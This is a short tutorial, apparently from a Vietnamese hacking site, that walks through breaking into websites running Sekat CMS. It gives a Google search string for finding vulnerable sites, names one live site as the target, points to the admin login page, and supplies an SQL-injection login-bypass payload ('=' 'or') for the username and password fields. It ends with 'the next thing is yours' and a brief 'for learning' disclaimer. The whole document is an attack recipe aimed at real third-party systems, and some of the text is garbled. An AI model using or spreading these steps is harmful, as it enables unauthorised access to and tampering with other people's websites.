Sekat CMS is currently suffering from a SQL Injection vulnerability, with only a few tips small, you can access the Admin admin rights of the Website, without having to spend a lot of time to exploit.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
I’ll go straight to the point
Step 1: Find the Website use Sket CMS by Google
Enter the search command below into Google Search
intext:"Developed by Sekat Technologies" -site:https://cxsecurity.com
Step 2: Choose any 1 Website listed in Google
I will choose the page: http://unstccs.com to Test
Step 3: Access the Weblogin Admin using the link below
http://namewebiste.com/member_login.php
Specifically would be:
Step 4: Exploit bugs sign inp equals fill User and Pass as below:
Username: '=' 'or' Password: '=' 'or'
Step 5: Access to Admin rights, the next thing is yours
Should only be used for learning, do not destroy others